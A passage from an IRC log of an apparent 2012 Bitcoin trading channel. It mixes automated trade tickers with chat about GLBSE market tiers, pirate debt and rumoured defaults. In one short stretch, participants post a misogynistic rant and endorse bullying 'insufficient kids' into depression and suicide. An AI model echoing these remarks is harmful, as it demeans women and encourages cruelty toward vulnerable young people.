you. Sep 07 23:08:50 ;p Sep 07 23:09:31 EEEEEEEEEEEEEEEEEEEnnnnnnnnnnnglish Sep 07 23:10:04 i ginore no one Sep 07 23:10:15 Me neither Sep 07 23:10:16 .tr :en :fr but why don't you speak le francais! Sep 07 23:10:18 mircea_popescu: "mais pourquoi ne parlez-vous pas le francais !" (en to fr, translate.google.com) Sep 07 23:10:24 I just ignore individual stuff Sep 07 23:10:46 google translate fails hard on romanian Sep 07 23:11:05 http://i0.kym-cdn.com/photos/images/newsfeed/000/143/627/tumblr_lf6eqog2rH1qzljhoo1_500.jpg?1309740951 Sep 07 23:11:15 jcpham depends. it usually is quite humorous. Sep 07 23:11:23 it never makes sense Sep 07 23:11:23 Google translate fails hard Sep 07 23:11:30 sense it makes. none. Sep 07 23:11:32 The sentence ends there Sep 07 23:11:43 it's like half intelligible and half garbage Sep 07 23:11:51 except the other half all the time. Sep 07 23:12:08 actually idea might be so to speak in english google of translate like style from now forever Sep 07 23:12:32 i think you nshould take the time to mirror it in readable engrish Sep 07 23:12:45 or pay someone to transcribe it Sep 07 23:12:54 well... it's an announcement for romanians who use a romanian service Sep 07 23:13:07 but i don't care about romanians Sep 07 23:13:09 other than you Sep 07 23:13:11 it just so happens to (maybe) be the first time someone dumped paypal for bitcoin Sep 07 23:13:24 otherwise i don't see why anyone;'d care Sep 07 23:13:32 i onloy want to read your words midnightmagic Sep 07 23:13:34 shit Sep 07 23:13:37 mircea_popescu Sep 07 23:13:38 lol Sep 07 23:13:41 Search on the first page, on the wiki Sep 07 23:13:48 rdponticelli i did. Sep 07 23:14:12 There was nothing? Sep 07 23:14:19 Congratulations, then! Sep 07 23:14:30 well the wiki is kinda so-so up to date neh ? Sep 07 23:14:31 :) Sep 07 23:14:37 there's stuff there listed that's dead for 1 year Sep 07 23:14:43 Yeah :p Sep 07 23:15:15 Well, if you manage to get listed, you'll be the firs listed, at least Sep 07 23:15:39 haha i guess. not REALLY that big a deal neh Sep 07 23:15:42 so s.mpoe is holding above .0004 now? Sep 07 23:15:59 !ticker s.mpoe Sep 07 23:16:01 [MPEX:S.MPOE] 1day: 0.00039722 / 0.00041326 / 0.00042 (3147968 shares, 1,300.94 BTC), 30day: 0.000035 / 0.00036974 / 0.00042 (91696024 shares, 33,904.09 BTC) Sep 07 23:16:09 apparently... Sep 07 23:16:11 [MPEX] [F.GIGA.ETF] 690 @ 0.00069585 = 0.4801 BTC [+] Sep 07 23:16:26 [GLBSE] [FOO.PPPPT] 13 @ 0.19 = 2.47 BTC [+] Sep 07 23:16:47 Why is people buying pirate debt again? Sep 07 23:17:12 They know something I don't? Sep 07 23:17:15 o, he's gonna pay, haven't you heard ? Sep 07 23:17:25 Or just plain stupidity? Sep 07 23:17:25 rdponticelli: it makes sense to buy it at that price if you think there is a ~1 in 10 chance of him paying back the full amount owed Sep 07 23:17:34 he has had some issues and has been busy but just as soon as he gets back he's going to take care of things. Sep 07 23:18:03 personally, i think the odds are much worse than 1 in 10 Sep 07 23:18:15 smickles, me too Sep 07 23:18:25 That's why I ask Sep 07 23:18:43 One study found that 93% of us think we're above-average drivers. Another discovered that 25% of high school seniors rated themselves among the top 1% in their ability to get along well with others. Sep 07 23:20:20 [GLBSE] [MU] 1 @ 0.349 BTC [-] Sep 07 23:20:55 [GLBSE] [HYDRO.BONDS] 1 @ 1.4499 BTC [-] Sep 07 23:20:57 [GLBSE] [HYDRO.BONDS] 44 @ 1.45 = 63.8 BTC [+] Sep 07 23:21:41 mircea_popescu: i've seen several that ask people trivia and also ask them to rate their confidence level in their own answer as greater or less than 90% confidence. most people, on most questions rated > 90% confidence on the answer gave the incorrect answer Sep 07 23:22:09 somewhat mildly related : Sep 07 23:22:10 It really is quite amazing how very unattractive women in America act like they are hot shit. There is no humility and no gentle nature, just loud and brash behavior that makes you wonder if they’re self-deluded or “faking it until they make it,” even though we all know the only thing they’re making is the end of a pint of Haagen Daaz. They even have the audacity to repeatedly say “I’m hot” without a hint of irony. Why Sep 07 23:22:10 are they acting this way? Sep 07 23:23:39 i think that there is more factors involved in ugly idiot women Sep 07 23:23:51 is/are Sep 07 23:24:14 maybe. Sep 07 23:24:28 tho the entire social media culture surely helps explode overconfidence issues. Sep 07 23:24:39 after all, it's not polite to call an idiot an idiot. Sep 07 23:25:18 yeah, manners and 'political correctness' have done wonders for society Sep 07 23:25:45 i bame the parents Sep 07 23:25:49 *blame Sep 07 23:26:10 i blame the peers. Sep 07 23:26:24 insufficient kids need to be bullied into depression and suicide Sep 07 23:26:28 that's the entire point of a peer group. Sep 07 23:26:31 parents, peers, and person Sep 07 23:26:31 [GLBSE] [ASICMINER] 1 @ 0.12355 BTC [+] Sep 07 23:26:56 so too many unwanteds are just allowed to live and breathe up my oxygen? Sep 07 23:27:03 [GLBSE] [ASICMINER] 1 @ 0.118 BTC [-] Sep 07 23:27:05 [GLBSE] [ASICMINER] 11 @ 0.11700001 = 1.287 BTC [-] Sep 07 23:27:06 [GLBSE] [ASICMINER] 1 @ 0.11260011 BTC [-] Sep 07 23:27:10 unwanted with twisted sense of entitlement? Sep 07 23:27:50 basically. Sep 07 23:28:47 [GLBSE] [OBSI.HRPT] 17 @ 0.103989 = 1.7678 BTC [+] Sep 07 23:40:56 [MPEX] [S.MPOE] 48847 @ 0.00040288 = 19.6795 BTC [+] Sep 07 23:44:07 [GLBSE] [HYDRO.BONDS] 4 @ 1.4501 = 5.8004 BTC [+] Sep 07 23:44:09 [GLBSE] [HYDRO.BONDS] 19 @ 1.45 = 27.55 BTC [-] Sep 07 23:48:17 [GLBSE] [BMMO] 1 @ 0.060001 BTC [-] Sep 07 23:48:55 [GLBSE] [PAJKA.BOND] 1 @ 0.06 BTC [-] Sep 07 23:49:42 [GLBSE] [PPT.DIV] 3 @ 0.05 = 0.15 BTC [+] Sep 07 23:49:59 [GLBSE] [NYAN.C] 5 @ 0.65 = 3.25 BTC [-] Sep 07 23:57:04 [MPEX] [S.MPOE] 4470 @ 0.00040629 = 1.8161 BTC [+] Sep 07 23:57:06 [MPEX] [S.MPOE] 26030 @ 0.00040771 = 10.6127 BTC [+] Sep 08 00:02:22 rewards sent https://bitcointalk.org/index.php?topic=102176.msg1168653#msg1168653 Sep 08 00:05:15 Glimpse into the future: Sep 08 00:05:15 I talked to some of the services you have expressed you'd like to use: Sep 08 00:05:15 - MPEX, made required changes to their api, not yet implemented on our side Sep 08 00:05:15 - GLBSE, approved required changes to their api, not yet implemted on any side Sep 08 00:05:15 - BTC-E, approved required changes to their api, not yet implemted on any side Sep 08 00:05:15 - BITME, talked about it, no concreteness at the moment Sep 08 00:05:18 yee. Sep 08 00:11:32 [GLBSE] [OBSI.HRPT] 4 @ 0.103 = 0.412 BTC [-] Sep 08 00:11:33 [GLBSE] [OBSI.HRPT] 99 @ 0.1025 = 10.1475 BTC [-] Sep 08 00:11:35 [GLBSE] [OBSI.HRPT] 20 @ 0.1025 = 2.05 BTC [-] Sep 08 00:11:36 [GLBSE] [OBSI.HRPT] 100 @ 0.10241 = 10.241 BTC [-] Sep 08 00:11:37 [GLBSE] [OBSI.HRPT] 5 @ 0.1024 = 0.512 BTC [-] Sep 08 00:11:38 [GLBSE] [OBSI.HRPT] 200 @ 0.1021 = 20.42 BTC [-] Sep 08 00:11:39 [GLBSE] [OBSI.HRPT] 3 @ 0.102 = 0.306 BTC [-] Sep 08 00:11:40 [GLBSE] [OBSI.HRPT] 154 @ 0.102 = 15.708 BTC [-] Sep 08 00:13:43 [MPEX] [S.MPOE] 6070 @ 0.00040771 = 2.4748 BTC [+] Sep 08 00:13:44 [MPEX] [S.MPOE] 8383 @ 0.00040857 = 3.425 BTC [+] Sep 08 00:13:45 [MPEX] [S.MPOE] 6447 @ 0.00040908 = 2.6373 BTC [+] Sep 08 00:20:18 man Sep 08 00:20:21 its still saturday isnt it Sep 08 00:20:49 [GLBSE] [NASTY] 2 @ 0.6199 = 1.2398 BTC [-] Sep 08 00:20:50 [GLBSE] [NASTY] 4 @ 0.62 = 2.48 BTC [+] Sep 08 00:21:08 fuck, its still friday Sep 08 00:21:26 usagi: find me somewhere its sunday Sep 08 00:25:20 [GLBSE] [PUREMINING] 3 @ 0.0931 = 0.2793 BTC [-] Sep 08 00:29:26 isn't it incredible how every other website is the largest something or other ? Sep 08 00:30:32 Lol, don't you keep claiming that yourself mircea for your own? Sep 08 00:30:44 BitVPS is the largest VPS provider accepting Bitcoin in the tri-county area! Sep 08 00:32:20 [GLBSE] [JTME] 4 @ 0.81 = 3.24 BTC [-] Sep 08 00:32:59 [GLBSE] [MU] 1 @ 0.349 BTC [-] Sep 08 00:33:19 [GLBSE] [GIGAMINING] 5 @ 0.76 = 3.8 BTC [-] Sep 08 00:34:46 [GLBSE] [PUREMINING] 57 @ 0.0949 = 5.4093 BTC [+] Sep 08 00:35:01 [GLBSE] [JTME] 1 @ 0.81 BTC [-] Sep 08 00:35:10 BTC-Mining hmm, on multiple scores. Sep 08 00:35:21 the only thing is that i'm fo real, dunno about all these other lozzrs :D Sep 08 00:36:46 [GLBSE] [BITCOINMINV] 10 @ 0.13 = 1.3 BTC [+] Sep 08 00:38:02 [GLBSE] [OBSI.HRPT] 246 @ 0.102 = 25.092 BTC [-] Sep 08 00:38:05 [MPEX] [S.MPOE] 10153 @ 0.00040465 = 4.1084 BTC [-] Sep 08 00:38:05 yeah yeah yeah, everybody says that. I'm the real best, others are losers, blah blah... =P Sep 08 00:38:12 :D Sep 08 00:38:55 [GLBSE] [ZETA-MINING] 1 @ 0.205 BTC [+] Sep 08 00:41:30 Now, back to the daily Bitcoin Drama, Kent. (Yes, we now have Kent Brockman, presenting the daily Bitcoin drama news.) Sep 08 00:44:47 [GLBSE] [OBSI.HRPT] 130 @ 0.10170001 = 13.221 BTC [-] Sep 08 00:44:49 [GLBSE] [OBSI.HRPT] 44 @ 0.1015 = 4.466 BTC [-] Sep 08 00:44:57 [GLBSE] [YABMC] 1 @ 0.116 BTC [+] Sep 08 00:44:59 No idea. Sep 08 00:45:20 Watch the news channel, it's streaming live on Bitcointalk.org Sep 08 00:46:02 [GLBSE] [OBSI.HRPT] 24 @ 0.102 = 2.448 BTC [+] Sep 08 00:46:04 [MPEX] [F.GIGA.ETF] 10212 @ 0.00069515 = 7.0989 BTC [-] Sep 08 00:46:24 [GLBSE] [GSDPT] 2 @ 0.0034 = 0.0068 BTC [+] Sep 08 00:46:30 [GLBSE] [YABMC] 1 @ 0.116 BTC [+] Sep 08 00:47:56 not really streaming... Sep 08 00:47:59 more like steaming. Sep 08 00:47:59 [GLBSE] [ZETA-MINING] 4 @ 0.206206 = 0.8248 BTC [+] Sep 08 00:49:14 [GLBSE] [GIGAMINING] 2 @ 0.76 = 1.52 BTC [-] Sep 08 00:49:32 [MPEX] [S.MPOE] 20447 @ 0.00040452 = 8.2712 BTC [-] Sep 08 00:49:34 eheh Sep 08 00:49:34 [MPEX] [S.MPOE] 50900 @ 0.00040784 = 20.7591 BTC [+] Sep 08 00:49:35 [MPEX] [S.MPOE] 49653 @ 0.00040908 = 20.312 BTC [+] Sep 08 00:49:36 [MPEX] [S.MPOE] 59400 @ 0.00041003 = 24.3558 BTC [+] Sep 08 00:49:37 [MPEX] [S.MPOE] 39704 @ 0.00041262 = 16.3827 BTC [+] Sep 08 00:49:38 [MPEX] [S.MPOE] 25100 @ 0.00041356 = 10.3804 BTC [+] Sep 08 00:49:39 [MPEX] [S.MPOE] 4900 @ 0.00041394 = 2.0283 BTC [+] Sep 08 00:49:40 [MPEX] [S.MPOE] 54200 @ 0.00041517 = 22.5022 BTC [+] Sep 08 00:49:41 [MPEX] [S.MPOE] 264 @ 0.00041606 = 0.1098 BTC [+] Sep 08 00:49:42 [MPEX] [S.MPOE] 48800 @ 0.00041743 = 20.3706 BTC [+] Sep 08 00:49:43 [MPEX] [S.MPOE] 58000 @ 0.00041745 = 24.2121 BTC [+] Sep 08 00:49:43 [MPEX] [S.MPOE] 41934 @ 0.00041754 = 17.5091 BTC [+] Sep 08 00:49:45 [MPEX] [S.MPOE] 46698 @ 0.00042 = 19.6132 BTC [+] Sep 08 00:50:14 [GLBSE] [PUREMINING] 6 @ 0.095 = 0.57 BTC [+] Sep 08 00:53:35 [GLBSE] [NYAN.B] 5 @ 0.99 = 4.95 BTC [-] Sep 08 00:54:19 https://bitcointalk.org/index.php?topic=106350.msg1168407#msg1168407 apparently bruce wagner got mybitcoin'd again ? Sep 08 00:59:01 [MPEX] [S.MPOE] 36800 @ 0.00040489 = 14.9 BTC [-] Sep 08 01:00:42 mircea_popescu: he bought ANOTHER house in the gaymans? Sep 08 01:03:08 lol Sep 08 01:03:45 wait hold up Sep 08 01:03:47 a supplier of bitcoins Sep 08 01:04:13 so, what, he got them from a third party distributer who got them straight off the boat from china? Sep 08 01:04:22 what the fuck is this shit dot jaypeg Sep 08 01:04:25 well i have no ideea Sep 08 01:04:53 bang bang bang one one eleven Sep 08 01:05:40 [MPEX] [F.GIGA.ETF] 4834 @ 0.00069515 = 3.3604 BTC [-] Sep 08 01:06:30 http://thechive.com/2012/07/11/bigger-is-definitely-not-always-better/ Sep 08 01:07:34 photoshopping is so easy now adays Sep 08 01:09:27 [GLBSE] [OBSI.HRPT] 4 @ 0.102 = 0.408 BTC [+] Sep 08 01:10:54 Too big? That's more than just big, it's gone ridiculous. Sep 08 01:11:12 Kind of like this: http://media.tumblr.com/tumblr_lrhzmrC9oh1qkilov.jpg Sep 08 01:13:43 be cool if her name was holstein Sep 08 01:14:43 and this is why I dont watch american dad Sep 08 01:16:19 Yes, it looks stupid indeed, Diablo. Sep 08 01:16:54 [GLBSE] [GSDPT] 25 @ 0.0034 = 0.085 BTC [+] Sep 08 01:17:20 [GLBSE] [GSDPT] 1 @ 0.0034 BTC [+] Sep 08 01:17:24 family guy is okay thugh Sep 08 01:18:30 [GLBSE] [BBBB] 11 @ 0.00024 = 0.0026 BTC [+] Sep 08 01:19:18 [GLBSE] [FUTUREFUND] 2 @ 0.00012433 = 0.0002 BTC [+] Sep 08 01:19:38 Well, as stupid as it looks, the episode referenced still conveys a good story. Obviously quite similar stories to Family Guy in general. The humour is different however. Sep 08 01:23:04 [GLBSE] [BDK.BND] 12 @ 0.0911 = 1.0932 BTC [-] Sep 08 01:23:06 [GLBSE] [BDK.BND] 15 @ 0.091 = 1.365 BTC [-] Sep 08 01:24:51 [GLBSE] [OBSI.HRPT] 1 @ 0.1019 BTC [-] Sep 08 01:24:53 [GLBSE] [OBSI.HRPT] 126 @ 0.1015 = 12.789 BTC [-] Sep 08 01:24:54 [GLBSE] [OBSI.HRPT] 1 @ 0.1011 BTC [-] Sep 08 01:24:55 [GLBSE] [OBSI.HRPT] 2 @ 0.101 = 0.202 BTC [-] Sep 08 01:24:57 [GLBSE] [OBSI.HRPT] 99 @ 0.1003 = 9.9297 BTC [-] Sep 08 01:24:58 [GLBSE] [OBSI.HRPT] 290 @ 0.1 = 29 BTC [-] Sep 08 01:24:59 [GLBSE] [OBSI.HRPT] 481 @ 0.1 = 48.1 BTC [-] Sep 08 01:26:34 [GLBSE] [OBSI.HRPT] 28 @ 0.1 = 2.8 BTC [-] Sep 08 01:32:06 [GLBSE] [RAREEARTH] 30 @ 0.0096 = 0.288 BTC [+] Sep 08 01:33:01 [GLBSE] [RAREEARTH] 5 @ 0.0096 = 0.048 BTC [+] Sep 08 01:33:28 [GLBSE] [BDK.BND] 10 @ 0.091 = 0.91 BTC [-] Sep 08 01:35:13 [MPEX] [F.GIGA.ETF] 15900 @ 0.00069118 = 10.9898 BTC [-] Sep 08 01:35:14 https://allthingsd.com/20120907/paypals-new-president-faces-the-music-if-we-suck-we-now-face-it/ Sep 08 01:35:15 lol Sep 08 01:35:17 too little too late Sep 08 01:37:24 [MPEX] [S.MPOE] 3700 @ 0.00040245 = 1.4891 BTC [-] Sep 08 01:39:47 Yeah, the damage is already long done... Sep 08 01:47:10 [GLBSE] [OBSI.HRPT] 5 @ 0.102 = 0.51 BTC [+] Sep 08 01:48:21 [GLBSE] [FDBF] 2 @ 0.15 = 0.3 BTC [+] Sep 08 01:49:34 [GLBSE] [GIGAMINING] 1 @ 0.76 BTC [-] Sep 08 01:50:14 [GLBSE] [OBSI.HRPT] 1 @ 0.102 BTC [+] Sep 08 01:50:49 [GLBSE] [FOO.PPPPT] 2 @ 0.075 = 0.15 BTC [-] Sep 08 01:51:56 [MPEX] [S.MPOE] 3964 @ 0.00040196 = 1.5934 BTC [-] Sep 08 01:52:15 Nice that they intend to face adversity Sep 08 01:52:22 Who'll slap the first? Sep 08 01:52:31 :D Sep 08 01:57:14 [GLBSE] [OBSI.HRPT] 1 @ 0.102 BTC [+] Sep 08 01:59:59 [GLBSE] [SS] 3 @ 0.02 = 0.06 BTC [-] Sep 08 02:01:28 [GLBSE] [GIGAMINING] 1 @ 0.76 BTC [-] Sep 08 02:02:13 [GLBSE] [FUTUREFUND] 1 @ 0.00012433 BTC [+] Sep 08 02:05:52 [GLBSE] [FUTUREFUND] 1 @ 0.00012433 BTC [+] Sep 08 02:09:30 [GLBSE] [NYAN.C] 2 @ 0.695 = 1.39 BTC [+] Sep 08 02:09:31 [GLBSE] [NYAN.C] 38 @ 0.699 = 26.562 BTC [+] Sep 08 02:09:32 [GLBSE] [NYAN.C] 15 @ 0.7 = 10.5 BTC [+] Sep 08 02:09:33 [GLBSE] [NYAN.C] 148 @ 0.7 = 103.6 BTC [+] Sep 08 02:09:54 usagi: pm Sep 08 02:12:13 [GLBSE] [GSDPT] 75 @ 0.0034 = 0.255 BTC [+] Sep 08 02:12:23 [GLBSE] [OBSI.HRPT] 8 @ 0.102 = 0.816 BTC [+] Sep 08 02:12:37 [GLBSE] [NASTY] 1 @ 0.62 BTC [+] Sep 08 02:13:03 nefario: I'm thinking about bidding on METAL & METAL.SILVER, but need some clarification Re: maximum funding limitations for unverified people on GLBSE Sep 08 02:13:24 there is none Sep 08 02:13:34 just keep in mind Sep 08 02:13:34 nor should there be Sep 08 02:13:51 that assets in the pink market are more risky than in others Sep 08 02:13:53 although Sep 08 02:14:05 right now there is nothing in the other markets yet Sep 08 02:14:10 thats going to change Sep 08 02:14:24 ok, thx Sep 08 02:19:27 pink market? Sep 08 02:19:53 BTC-Mining: otc Sep 08 02:20:03 like terra's fund Sep 08 02:20:57 What? No, about GLBSE Sep 08 02:20:57 [GLBSE] [KRAKEN] 251 @ 0.00999999 = 2.51 BTC [+] Sep 08 02:20:58 [GLBSE] [KRAKEN] 1735 @ 0.0099 = 17.1765 BTC [-] Sep 08 02:20:59 [GLBSE] [KRAKEN] 500 @ 0.00975 = 4.875 BTC [-] Sep 08 02:21:14 should be something like the pink sheets neh ? Sep 08 02:21:42 BTC-Mining: GLBSE has 3 markets on it now Sep 08 02:21:50 What is required for each one? Sep 08 02:21:50 at the moment all assets are in pink Sep 08 02:21:53 well Sep 08 02:21:56 nothing for pink Sep 08 02:21:57 for white Sep 08 02:22:05 verification with at least phone, ID and address Sep 08 02:22:07 and Sep 08 02:22:15 an actual income earning business Sep 08 02:22:16 and Sep 08 02:22:26 accounts to be scrutinised Sep 08 02:23:18 Hmm, interesting. Sep 08 02:24:35 there are a couple of assets that already meet this and need only publish accounts Sep 08 02:24:43 Maybe the main market list could contain an icon to define that and the top link would filter them by color? Sep 08 02:25:02 What about blue requirements? Sep 08 02:25:04 [GLBSE] [FUTUREFUND] 3 @ 0.00012433 = 0.0004 BTC [+] Sep 08 02:25:29 Has to be a smurf-run business. Sep 08 02:26:09 lol Sep 08 02:26:25 Ah, so blue is the best tier Sep 08 02:26:27 blue has white reequirements plus Sep 08 02:26:36 background check on issuer Sep 08 02:26:39 like blue label Sep 08 02:26:41 external auditor Sep 08 02:26:46 although The John Walker is the best Sep 08 02:27:02 and a treasurer who is required to be able to release or move funds Sep 08 02:27:08 blue being bluechip Sep 08 02:27:49 [GLBSE] [OBSI.HRPT] 5 @ 0.102 = 0.51 BTC [+] Sep 08 02:28:30 of course doesn't mean an asset is more or less risky or would be more or less profitable Sep 08 02:28:45 then what's the point ? Sep 08 02:28:53 but provides min standards of information about asset for investors to make a decision Sep 08 02:29:05 Classify them by the amount of disclosure and auditing made? Sep 08 02:29:20 something like that Sep 08 02:29:38 i'm not even going to say anything. Sep 08 02:29:43 if you want assets to be rated by risk Sep 08 02:29:49 you need an external ratings agency Sep 08 02:30:01 mircea_popescu: you want to decide the ratings for assets for us? Sep 08 02:30:09 nah Im just kidding, you can piss off Sep 08 02:30:16 especially since there's no single notion of risk Sep 08 02:30:23 mircea, what's wrong with that method of classification? Sep 08 02:30:45 I'm doing it Sep 08 02:30:47 thats what Sep 08 02:30:53 nefario: don't be pissy just cause he has a better beard than you Sep 08 02:31:01 ? Sep 08 02:31:03 1. that it's an entirely arbitrary and mostly meaningless clasification made by someone who has repeatedly proven to lack even cursory competence in the field and 2. that it doesn't really do anything. Sep 08 02:31:05 if it doesn't assure less risk nor more profits then its unneeded complexity? Sep 08 02:31:35 Ignatius-otc it's what they call theatre. as in, security theatre. it's a sort of nefario tsa. Sep 08 02:31:44 nefario: http://photobook.bitvps.com/index.php/mircea_popescu Sep 08 02:32:19 that's a monster beard Sep 08 02:32:28 srsly, this design by bellybutton picking has to cease. Sep 08 02:32:31 [MPEX] [F.GIGA.ETF] 9064 @ 0.00069515 = 6.3008 BTC [+] Sep 08 02:32:33 [MPEX] [F.GIGA.ETF] 10447 @ 0.0007 = 7.3129 BTC [+] Sep 08 02:32:41 at least have the decency to study up on how the original blue chips are clasified. Sep 08 02:32:50 if you want ratings a ratings agency has to be started, but it's not something I can do Sep 08 02:32:51 if you're gonna abuse their trademark. Sep 08 02:32:51 mircea, how would you find out what is more or less likely to fail/be a scam? Sep 08 02:33:09 BTC-Mining that'd be secret sauce at this point in the game. Sep 08 02:33:19 i have absolutely no incentive to share. Sep 08 02:33:21 didn't realise blue was trademarked Sep 08 02:33:44 safra sgnb sgornick smickles SomeoneWeird SuprTiggr Sep 08 02:34:01 you probably didn't realise that dr nefario is trademarked either. Sep 08 02:34:34 there is a difference between copyright and trademark Sep 08 02:34:39 ... Sep 08 02:34:48 dude srlsy. do you own any trademarks ? Sep 08 02:35:05 hmmm Sep 08 02:35:10 thats a good idea Sep 08 02:35:14 sigh. Sep 08 02:35:44 inb4 "us" discovers that those aren't free and balks at it. Sep 08 02:35:49 [MPEX] [F.GIGA.ETF] 8300 @ 0.00070602 = 5.86 BTC [+] Sep 08 02:35:53 anyway, enough fun for one day. catch you all tomorrow. Sep 08 02:36:23 (but yes, we've had plenty of laughs around the office at the fact that if i were mean i could have registered glbse about 20 times over so far) **** BEGIN LOGGING AT Sat Sep 8 18:48:08 2012 Sep 08 18:50:27 it will chagne Sep 08 18:51:06 ok ...ive ben lazy ... here: have lulz (finally) http://bitromney.com/ Sep 08 18:51:12 i think thats all of u Sep 08 18:51:45 :) Sep 08 18:52:51 [GLBSE] [GIGAMINING] 2 @ 0.61021 = 1.2204 BTC [-] Sep 08 18:52:53 [GLBSE] [GIGAMINING] 2 @ 0.6102 = 1.2204 BTC [-] Sep 08 18:52:54 [GLBSE] [GIGAMINING] 8 @ 0.61011 = 4.8809 BTC [-] Sep 08 18:52:55 [GLBSE] [GIGAMINING] 7 @ 0.61001 = 4.2701 BTC [-] Sep 08 18:52:56 [GLBSE] [GIGAMINING] 36 @ 0.61 = 21.96 BTC [-] Sep 08 18:53:29 [MPEX] [S.MPOE] 2603 @ 0.00039838 = 1.037 BTC [-] Sep 08 18:53:30 [MPEX] [S.MPOE] 2356 @ 0.00039811 = 0.9379 BTC [-] Sep 08 18:54:19 [MPEX] [S.MPOE] 22230 @ 0.00039811 = 8.85 BTC [-] Sep 08 18:54:21 [MPEX] [S.MPOE] 4170 @ 0.00039805 = 1.6599 BTC [-] Sep 08 18:54:33 I want some of that NEFT vodka Sep 08 18:55:25 lol nefta Sep 08 18:55:25 ahaha Sep 08 18:55:41 waht shitstorm? Sep 08 18:55:51 Erik is involved in everything :P Sep 08 18:55:54 Ofc ^^ Sep 08 18:55:57 marketing campaign Sep 08 18:57:38 [MPEX] [S.MPOE] 31433 @ 0.00039805 = 12.5119 BTC [-] Sep 08 18:57:49 he will be the new matthew? Sep 08 18:58:36 [GLBSE] [BITCOINMINV] 1 @ 0.12998 BTC [-] Sep 08 18:58:41 DeaDTerra what ? Sep 08 19:02:00 [GLBSE] [JTME] 1 @ 0.7 BTC [-] Sep 08 19:02:15 oh no.. btc is turning into money... Sep 08 19:02:25 [GLBSE] [OBSI.HRPT] 3 @ 0.102 = 0.306 BTC [+] Sep 08 19:02:36 [GLBSE] [TYGRR.BOND-P] 1 @ 0.07898999 BTC [-] Sep 08 19:02:37 [GLBSE] [TYGRR.BOND-P] 2 @ 0.07899 = 0.158 BTC [+] Sep 08 19:04:11 https://bitcointalk.org/index.php?topic=106391.0 <<< morning reminder. go read it. Sep 08 19:04:18 [GLBSE] [JTME] 15 @ 0.8549 = 12.8235 BTC [+] Sep 08 19:05:23 [GLBSE] [JTME] 1 @ 0.911 BTC [+] Sep 08 19:08:29 [GLBSE] [ASICMINER] 13 @ 0.1198 = 1.5574 BTC [+] Sep 08 19:11:40 Erik is not a idiot Sep 08 19:11:47 He's in fact very smart Sep 08 19:11:58 To offer Mitt such a option is a MAJOR publicity stunt. Sep 08 19:12:19 which one of the idiots on my ignore list is droning on about erik being "an idiot" ? Sep 08 19:12:30 He has nothing to do with the illegality he's just offering his conversion services Sep 08 19:12:30 so i can... uhmm... put them on my ignore list ? Sep 08 19:12:35 there's nothing wrong with that Sep 08 19:12:41 Usagi Sep 08 19:12:44 o i see Sep 08 19:12:49 the expert wikipedian. Sep 08 19:13:01 usagi, your mother has a stupid yet anonymous son/daughter. Sep 08 19:13:39 is mp talking again? the room got stupid... Sep 08 19:13:49 [MPEX] [S.MPOE] 2397 @ 0.00039805 = 0.9541 BTC [-] Sep 08 19:13:49 and notin the d3 way Sep 08 19:14:12 [MPEX] [S.DICE] 43117 @ 0.0034 = 146.5978 BTC [+] Sep 08 19:14:26 must be Sep 08 19:14:29 fack volume again Sep 08 19:14:34 fake* Sep 08 19:14:40 what happened to gigamining bond prices? Sep 08 19:14:45 any reason behind it ? Sep 08 19:14:49 lmao Chaang-Noi you're the only fake thing going on. Sep 08 19:14:57 occulta prolly the hashking issue. Sep 08 19:15:07 tho nobody wants to be a man and admit to anything. Sep 08 19:15:20 whats the issue? Sep 08 19:15:21 hm Sep 08 19:15:26 took its time to drop? Sep 08 19:15:29 giga is being sold Sep 08 19:15:35 well earlier someone complained about not being able to take money out Sep 08 19:15:41 they got an offer at 50 cents to the dollar, didn't sell Sep 08 19:15:47 hasking has defalted Sep 08 19:15:49 on the forum someone complain about payments being late since rthe 3rd Sep 08 19:15:58 hashking said he'll make an announcement today Sep 08 19:16:03 i dunno if he did or not. Sep 08 19:16:09 tere is a thread about it Sep 08 19:16:13 hashking defaulted on what? seems i totally missed something Sep 08 19:16:18 o he had a 1% fund Sep 08 19:16:20 he said he wold makea comment today or yesterday Sep 08 19:16:24 nothing happened Sep 08 19:16:27 he is fail cat Sep 08 19:16:36 anyway, hk and giga were best friends, and after the pirate thing nobody trusts anyone of the people who gave him a 10 in the wot Sep 08 19:16:40 or otherwise were involved. Sep 08 19:16:50 i have never had a late payment from giga Sep 08 19:16:54 yet. Sep 08 19:16:59 [GLBSE] [OBSI.HRPT] 20 @ 0.102 = 2.04 BTC [+] Sep 08 19:17:17 giga will be fine, but im going to assume things will changefor the future... Sep 08 19:17:50 [GLBSE] [FDBF] 3 @ 0.15 = 0.45 BTC [+] Sep 08 19:18:25 ummm Sep 08 19:18:35 what if i sed out the dirt for free? Sep 08 19:18:38 sned Sep 08 19:18:43 fuck Sep 08 19:18:50 i wont Sep 08 19:18:55 but i know whts going to happen Sep 08 19:19:14 btw i hold nothing giga Sep 08 19:19:20 however giga holds my pirate bonds... Sep 08 19:19:39 or used to manage:) Sep 08 19:19:45 [GLBSE] [GIGAMINING] 1 @ 0.6499 BTC [+] Sep 08 19:19:56 on call Sep 08 19:20:33 so giga invested all his money with pirate and other passthoughs? Sep 08 19:20:41 not all Sep 08 19:20:44 i dont see how this really effects a mining bond though, if he has the hardware? Sep 08 19:20:58 wll.. Sep 08 19:21:01 well... Sep 08 19:21:13 $.5/mhash is still ok? Sep 08 19:21:25 lol Sep 08 19:21:28 i dont get it Sep 08 19:21:45 go on usagi... Sep 08 19:21:46 5mash for $2.50 Sep 08 19:21:52 whats wrong with that? Sep 08 19:22:48 like what? Sep 08 19:23:05 that he had some funds invested with pirate? Sep 08 19:23:13 big deal Sep 08 19:23:17 didnt everyone? lol Sep 08 19:23:30 [MPEX] [S.MPOE] 6827 @ 0.0003999 = 2.7301 BTC [+] Sep 08 19:23:32 [MPEX] [S.MPOE] 14173 @ 0.00040074 = 5.6797 BTC [+] Sep 08 19:23:43 all i see is a mhash for $.5 Sep 08 19:23:45 which is fine Sep 08 19:23:53 usagi: stop saying you know something that you won't say Sep 08 19:24:00 The really funny thing is the one thing about pirate no one has questioned yet Sep 08 19:24:04 If that's the case, just don't say nothing Sep 08 19:24:05 i agree, its kind of pointless Sep 08 19:24:20 The really funny thing is the one thing about pirate no one has questioned yet wtf? Sep 08 19:24:31 what is that one thing? Sep 08 19:24:35 usagi: he has the hardware Sep 08 19:24:36 whats the issue? Sep 08 19:24:44 The really funny thing is the one thing about pirate no one has questioned yet wtf? Sep 08 19:24:52 so giga invested all his money with pirate and other passthoughs? << likely. Sep 08 19:25:05 money != hardware Sep 08 19:25:09 that he already owns Sep 08 19:25:13 gigi said he will expand with asics... Sep 08 19:25:22 i said it Sep 08 19:25:25 he will expand with the trade in program. Sep 08 